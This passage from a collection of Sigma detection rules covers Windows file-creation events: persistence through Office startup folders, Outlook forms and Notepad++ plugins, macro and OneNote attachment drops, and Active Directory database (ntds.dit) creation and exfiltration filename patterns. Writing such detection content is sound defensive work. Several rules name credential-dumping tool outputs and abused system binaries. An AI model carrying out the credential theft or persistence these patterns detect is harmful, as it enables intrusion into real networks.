condition: selection and not filter_main\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_new_scr_file.yml",
    "content": "title: SCR File Write Event\nid: c048f047-7e2a-4888-b302-55f509d4a91d\nstatus: test\ndescription: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Libraries/Desk/\nauthor: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'\ndate: 2022-04-27\nmodified: 2023-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '.scr'\n    filter:\n        TargetFilename|contains:\n            - ':\\$WINDOWS.~BT\\NewOS\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n            - ':\\WUDownloadCache\\' # Windows Update Download Cache\n    condition: selection and not filter\nfalsepositives:\n    - The installation of new screen savers by third party software\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml",
    "content": "title: Potential Persistence Via Notepad++ Plugins\nid: 54127bd4-f541-4ac3-afdb-ea073f63f692\nstatus: test\ndescription: Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence\nreferences:\n    - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-10\nmodified: 2025-09-01\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\Notepad++\\plugins\\'\n        TargetFilename|endswith: '.dll'\n    filter_gup:\n        Image|endswith: '\\Notepad++\\updater\\gup.exe'\n    filter_install:\n        # This filter is for Sigma dataset you could remove it or change when using the rule in your own env\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Temp\\'\n        Image|endswith:\n            - '\\target.exe'\n            - 'Installer.x64.exe'\n    filter_main_installer:\n        Image|contains: '\\npp.'\n        Image|endswith: '.exe'\n        TargetFilename:\n            - 'C:\\Program Files\\Notepad++\\plugins\\NppExport\\NppExport.dll'\n            - 'C:\\Program Files\\Notepad++\\plugins\\mimeTools\\mimeTools.dll'\n            - 'C:\\Program Files\\Notepad++\\plugins\\NppConverter\\NppConverter.dll'\n            - 'C:\\Program Files\\Notepad++\\plugins\\Config\\nppPluginList.dll'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Possible FPs during first installation of Notepad++\n    - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml",
    "content": "title: NTDS.DIT Created\nid: 0b8baa3f-575c-46ee-8715-d6f28cc7d33c\nstatus: test\ndescription: Detects creation of a file named \"ntds.dit\" (Active Directory Database)\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: 'ntds.dit'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml",
    "content": "title: NTDS.DIT Creation By Uncommon Parent Process\nid: 4e7050dd-e548-483f-b7d6-527ab4fa784d\nrelated:\n    - id: 11b1ed55-154d-4e82-8ad7-83739298f720\n      type: similar\nstatus: test\ndescription: Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon parent process or directory\nreferences:\n    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration\n    - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/\n    - https://pentestlab.blog/tag/ntds-dit/\n    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-11\nmodified: 2023-01-05\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: file_event\n    definition: 'Requirements: The \"ParentImage\" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enrich the log with additional ParentImage data'\ndetection:\n    selection_file:\n        TargetFilename|endswith: '\\ntds.dit'\n    selection_process_parent:\n        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11\n        ParentImage|endswith:\n            - '\\cscript.exe'\n            - '\\httpd.exe'\n            - '\\nginx.exe'\n            - '\\php-cgi.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\w3wp.exe'\n            - '\\wscript.exe'\n    selection_process_parent_path:\n        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11\n        ParentImage|contains:\n            - '\\apache'\n            - '\\tomcat'\n            - '\\AppData\\'\n            - '\\Temp\\'\n            - '\\Public\\'\n            - '\\PerfLogs\\'\n    condition: selection_file and 1 of selection_process_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml",
    "content": "title: NTDS.DIT Creation By Uncommon Process\nid: 11b1ed55-154d-4e82-8ad7-83739298f720\nrelated:\n    - id: 4e7050dd-e548-483f-b7d6-527ab4fa784d\n      type: similar\nstatus: test\ndescription: Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon process or a process located in a suspicious directory\nreferences:\n    - https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/\n    - https://adsecurity.org/?p=2398\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-11\nmodified: 2022-07-14\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_ntds:\n        TargetFilename|endswith: '\\ntds.dit'\n    selection_process_img:\n        Image|endswith:\n            # Add more suspicious processes as you see fit\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n            - '\\wt.exe'\n    selection_process_paths:\n        Image|contains:\n            - '\\AppData\\'\n            - '\\Temp\\'\n            - '\\Public\\'\n            - '\\PerfLogs\\'\n    condition: selection_ntds and 1 of selection_process_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml",
    "content": "title: NTDS Exfiltration Filename Patterns\nid: 3a8da4e0-36c1-40d2-8b29-b3e890d5172a\nstatus: test\ndescription: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.\nreferences:\n    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb\n    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1\n    - https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-11\nmodified: 2023-05-05\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\All.cab' # https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1\n            - '.ntds.cleartext' # https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_addin_persistence.yml",
    "content": "title: Potential Persistence Via Microsoft Office Add-In\nid: 8e1cb247-6cf6-42fa-b440-3f27d57e9936\nstatus: test\ndescription: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).\nreferences:\n    - Internal Research\n    - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence\n    - https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md\nauthor: NVISO\ndate: 2020-05-11\nmodified: 2023-02-08\ntags:\n    - attack.persistence\n    - attack.t1137.006\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_wlldropped:\n        TargetFilename|contains: '\\Microsoft\\Word\\Startup\\'\n        TargetFilename|endswith: '.wll'\n    selection_xlldropped:\n        TargetFilename|contains: '\\Microsoft\\Excel\\Startup\\'\n        TargetFilename|endswith: '.xll'\n    selection_xladropped:\n        TargetFilename|contains: 'Microsoft\\Excel\\XLSTART\\'\n        TargetFilename|endswith: '.xlam'\n    selection_generic:\n        TargetFilename|contains: '\\Microsoft\\Addins\\'\n        TargetFilename|endswith:\n            - '.xlam'\n            - '.xla'\n            - '.ppam'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate add-ins\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_macro_files_created.yml",
    "content": "title: Office Macro File Creation\nid: 91174a41-dc8f-401b-be89-7bfc140612a0\nrelated:\n    - id: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66\n      type: similar\nstatus: test\ndescription: Detects the creation of a new office macro files on the systems\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md\n    - https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-23\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '.docm'\n            - '.dotm'\n            - '.xlsm'\n            - '.xltm'\n            - '.potm'\n            - '.pptm'\n    condition: selection\nfalsepositives:\n    - Very common in environments that rely heavily on macro documents\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml",
    "content": "title: Office Macro File Download\nid: 0e29e3a7-1ad8-40aa-b691-9f82ecd33d66\nrelated:\n    - id: 91174a41-dc8f-401b-be89-7bfc140612a0\n      type: similar\nstatus: test\ndescription: |\n    Detects the creation of a new office macro files on the system via an application (browser, mail client).\n    This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md\n    - https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-23\nmodified: 2025-10-29\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_processes:\n        Image|endswith:\n            # Email clients\n            - '\\RuntimeBroker.exe' # Windows Email clients uses RuntimeBroker to create the files\n            - '\\outlook.exe'\n            - '\\thunderbird.exe'\n            # Browsers\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\iexplore.exe'\n            - '\\maxthon.exe'\n            - '\\MicrosoftEdge.exe'\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n            - '\\opera.exe'\n            - '\\safari.exe'\n            - '\\seamonkey.exe'\n            - '\\vivaldi.exe'\n            - '\\whale.exe'\n    selection_ext:\n        - TargetFilename|endswith:\n              - '.docm'\n              - '.dotm'\n              - '.xlsm'\n              - '.xltm'\n              - '.potm'\n              - '.pptm'\n        - TargetFilename|contains:\n              - '.docm:Zone'\n              - '.dotm:Zone'\n              - '.xlsm:Zone'\n              - '.xltm:Zone'\n              - '.potm:Zone'\n              - '.pptm:Zone'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate macro files downloaded from the internet\n    - Legitimate macro files sent as attachments via emails\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml",
    "content": "title: Office Macro File Creation From Suspicious Process\nid: b1c50487-1967-4315-a026-6491686d860e\nstatus: test\ndescription: Detects the creation of a office macro file from a a suspicious process\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md\n    - https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-23\nmodified: 2023-02-22\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    category: file_event\n    product: windows\n    definition: 'Requirements: The \"ParentImage\" field is not available by default on EID 11 of Sysmon logs. To be able to use this rule to the full extent you need to enriche the log with additional ParentImage data'\ndetection:\n    selection_cmd:\n        - Image|endswith:\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        # Note: ParentImage is a custom field and is not available by default on Sysmon EID 11\n        - ParentImage|endswith:\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n    selection_ext:\n        TargetFilename|endswith:\n            - '.docm'\n            - '.dotm'\n            - '.xlsm'\n            - '.xltm'\n            - '.potm'\n            - '.pptm'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml",
    "content": "title: OneNote Attachment File Dropped In Suspicious Location\nid: 7fd164ba-126a-4d9c-9392-0d4f7c243df0\nstatus: test\ndescription: Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/\n    - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\nmodified: 2023-09-19\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            # Note: add more common locations for drops such as download folders and the like. Or baseline legitimate locations and alert on everything else\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - ':\\Temp\\'\n        TargetFilename|endswith:\n            - '.one'\n            - '.onepkg'\n    filter_main_onenote:\n        Image|contains: ':\\Program Files\\Microsoft Office\\'\n        Image|endswith: '\\ONENOTE.EXE'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate usage of \".one\" or \".onepkg\" files from those locations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml",
    "content": "title: Suspicious File Created Via OneNote Application\nid: fcc6d700-68d9-4241-9a1a-06874d621b06\nstatus: test\ndescription: Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/\n    - https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/\n    - https://twitter.com/MaD_c4t/status/1623414582382567424\n    - https://labs.withsecure.com/publications/detecting-onenote-abuse\n    - https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/\n    - https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-09\nmodified: 2023-02-27\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\onenote.exe'\n            - '\\onenotem.exe'\n            - '\\onenoteim.exe'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\OneNote\\'\n        TargetFilename|endswith:\n            # TODO: Add more suspicious extensions\n            - '.bat'\n            - '.chm'\n            - '.cmd'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.htm'\n            - '.html'\n            - '.js'\n            - '.lnk'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    condition: selection\nfalsepositives:\n    - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.\n    - Occasional FPs might occur if OneNote is used internally to share different embedded documents\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_outlook_macro_creation.yml",
    "content": "title: New Outlook Macro Created\nid: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61\nrelated:\n    - id: 117d3d3a-755c-4a61-b23e-9171146d094c\n      type: derived\nstatus: test\ndescription: Detects the creation of a macro file for Outlook.\nreferences:\n    - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\nauthor: '@ScoubiMtl'\ndate: 2021-04-05\nmodified: 2023-02-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1137\n    - attack.t1008\n    - attack.t1546\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\outlook.exe'\n        TargetFilename|endswith: '\\Microsoft\\Outlook\\VbaProject.OTM'\n    condition: selection\nfalsepositives:\n    - User genuinely creates a VB Macro for their email\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_outlook_newform.yml",
    "content": "title: Potential Persistence Via Outlook Form\nid: c3edc6a5-d9d4-48d8-930e-aab518390917\nstatus: test\ndescription: Detects the creation of a new Outlook form which can contain malicious code\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79\n    - https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form\n    - https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2021-06-10\nmodified: 2023-02-22\ntags:\n    - attack.persistence\n    - attack.t1137.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\outlook.exe'\n        TargetFilename|contains:\n            - '\\AppData\\Local\\Microsoft\\FORMS\\IPM'\n            - '\\Local Settings\\Application Data\\Microsoft\\Forms' # Windows XP\n    condition: selection\nfalsepositives:\n    - Legitimate use of outlook forms\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml",
    "content": "title: Suspicious File Created in Outlook Temporary Directory\nid: fabb0e80-030c-4e3e-a104-d09676991ac3\nrelated:\n    - id: f748c45a-f8d3-4e6f-b617-fe176f695b8f\n      type: obsolete\nstatus: experimental\ndescription: |\n    Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.\n    This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.\nreferences:\n    - https://vipre.com/blog/svg-phishing-attacks-the-new-trick-in-the-cybercriminals-playbook/\n    - https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/\n    - https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/\nauthor: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-22\ntags:\n    - attack.initial-access\n    - attack.t1566.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_extension:\n        TargetFilename|endswith:\n            - '.cpl'\n            - '.hta'\n            - '.iso'\n            - '.rdp'\n            - '.svg'\n            - '.vba'\n            - '.vbe'\n            - '.vbs'\n    selection_location:\n        - TargetFilename|contains:\n              - '\\AppData\\Local\\Packages\\Microsoft.Outlook_'\n              - '\\AppData\\Local\\Microsoft\\Olk\\Attachments\\'\n        - TargetFilename|contains|all:\n              - '\\AppData\\Local\\Microsoft\\Windows\\'\n              - '\\Content.Outlook\\'\n    condition: all of selection_*\nfalsepositives:\n    - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml",
    "content": "title: Suspicious Outlook Macro Created\nid: 117d3d3a-755c-4a61-b23e-9171146d094c\nrelated:\n    - id: 8c31f563-f9a7-450c-bfa8-35f8f32f1f61\n      type: derived\nstatus: test\ndescription: Detects the creation of a macro file for Outlook.\nreferences:\n    - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53\n    - https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1137\n    - attack.t1008\n    - attack.t1546\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\Microsoft\\Outlook\\VbaProject.OTM'\n    filter:\n        Image|endswith: '\\outlook.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml",
    "content": "title: Publisher Attachment File Dropped In Suspicious Location\nid: 3d2a2d59-929c-4b78-8c1a-145dfe9e07b1\nstatus: test\ndescription: Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents\nreferences:\n    - https://twitter.com/EmericNasi/status/1623224526220804098\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - 'C:\\Temp\\'\n        TargetFilename|endswith: '.pub'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of \".pub\" files from those locations\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_startup_persistence.yml",
    "content": "title: Potential Persistence Via Microsoft Office Startup Folder\nid: 0e20c89d-2264-44ae-8238-aeeaba609ece\nstatus: test\ndescription: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.\nreferences:\n    - https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies\n    - https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders\nauthor: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-02\nmodified: 2023-06-22\ntags:\n    - attack.persistence\n    - attack.t1137\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_word_paths:\n        - TargetFilename|contains: '\\Microsoft\\Word\\STARTUP'\n        - TargetFilename|contains|all:\n              - '\\Office'\n              - '\\Program Files'\n              - '\\STARTUP'\n    selection_word_extension:\n        TargetFilename|endswith:\n            - '.doc'\n            - '.docm'\n            - '.docx'\n            - '.dot'\n            - '.dotm'\n            - '.rtf'\n    selection_excel_paths:\n        - TargetFilename|contains: '\\Microsoft\\Excel\\XLSTART'\n        - TargetFilename|contains|all:\n              - '\\Office'\n              - '\\Program Files'\n              - '\\XLSTART'\n    selection_excel_extension:\n        TargetFilename|endswith:\n            - '.xls'\n            - '.xlsm'\n            - '.xlsx'\n            - '.xlt'\n            - '.xltm'\n    filter_main_office:\n        Image|endswith:\n            - '\\WINWORD.exe'\n            - '\\EXCEL.exe'\n    condition: (all of selection_word_* or all of selection_excel_*) and not filter_main_office\nfalsepositives:\n    - Loading a user environment from a backup or a domain controller\n    - Synchronization of templates\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_susp_file_extension.yml",
    "content": "title: File With Uncommon Extension Created By An Office Application\nid: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\nstatus: test\ndescription: Detects the creation of files with an executable or script extension by an Office application.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-08-23\nmodified: 2025-10-17\ntags:\n    - attack.t1204.002\n    - attack.execution\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    # Note: Please add more file extensions to the logic of your choice.\n    selection1:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\powerpnt.exe'\n            - '\\visio.exe'\n            - '\\winword.exe'\n    selection2:\n        TargetFilename|endswith:\n            - '.bat'\n            - '.cmd'\n            - '.com'\n            - '.dll'\n            - '.exe'\n            - '.hta'\n            - '.ocx'\n            - '.proj'\n            - '.ps1'\n            - '.scf'\n            - '.scr'\n            - '.sys'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n            - '.wsh'\n    filter_main_localassembly:\n        TargetFilename|contains: '\\AppData\\Local\\assembly\\tmp\\'\n        TargetFilename|endswith: '.dll'\n    filter_optional_webservicecache: # matches e.g. directory with name *.microsoft.com\n        TargetFilename|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\Office\\'\n            - '\\WebServiceCache\\AllUsers'\n        TargetFilename|endswith: '.com'\n    filter_optional_webex:\n        Image|endswith: '\\winword.exe'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\webexdelta\\'\n        TargetFilename|endswith:\n            - '.dll'\n            - '.exe'\n    filter_optional_backstageinappnavcache: # matches e.g. C:\\Users\\xxxxx\\AppData\\Local\\Microsoft\\Office\\16.0\\BackstageInAppNavCache\\ODB-user@domain.com\n        TargetFilename|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Microsoft\\Office\\'\n            - '\\BackstageInAppNavCache\\'\n        TargetFilename|endswith: '.com'\n    condition: all of selection* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml",
    "content": "title: Uncommon File Created In Office Startup Folder\nid: a10a2c40-2c4d-49f8-b557-1a946bc55d9d\nstatus: test\ndescription: Detects the creation of a file with an uncommon extension in an Office application startup folder\nreferences:\n    - https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/\n    - http://addbalance.com/word/startup.htm\n    - https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3\n    - https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-05\nmodified: 2023-12-13\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_word_paths:\n        - TargetFilename|contains: '\\Microsoft\\Word\\STARTUP'\n        - TargetFilename|contains|all:\n              - '\\Office'\n              - '\\Program Files'\n              - '\\STARTUP'\n    filter_exclude_word_ext:\n        TargetFilename|endswith:\n            - '.docb' # Word binary document introduced in Microsoft Office 2007\n            - '.docm' # Word macro-enabled document; same as docx, but may contain macros and scripts\n            - '.docx' # Word document\n            - '.dotm' # Word macro-enabled template; same as dotx, but may contain macros and scripts\n            - '.mdb' # MS Access DB\n            - '.mdw' # MS Access DB\n            - '.pdf' # PDF documents\n            - '.wll' # Word add-in\n            - '.wwl' # Word add-in\n    selection_excel_paths:\n        - TargetFilename|contains: '\\Microsoft\\Excel\\XLSTART'\n        - TargetFilename|contains|all:\n              - '\\Office'\n              - '\\Program Files'\n              - '\\XLSTART'\n    filter_exclude_excel_ext:\n        TargetFilename|endswith:\n            - '.xll'\n            - '.xls'\n            - '.xlsm'\n            - '.xlsx'\n            - '.xlt'\n            - '.xltm'\n            - '.xlw'\n    filter_main_office_click_to_run:\n        Image|contains: ':\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_main_office_apps:\n        Image|contains:\n            - ':\\Program Files\\Microsoft Office\\'\n            - ':\\Program Files (x86)\\Microsoft Office\\'\n        Image|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n    condition: ((selection_word_paths and not filter_exclude_word_ext) or (selection_excel_paths and not filter_exclude_excel_ext)) and not 1 of filter_main_*\nfalsepositives:\n    - False positive might stem from rare extensions used by other Office utilities.\nlevel: high\n"
  },
  {
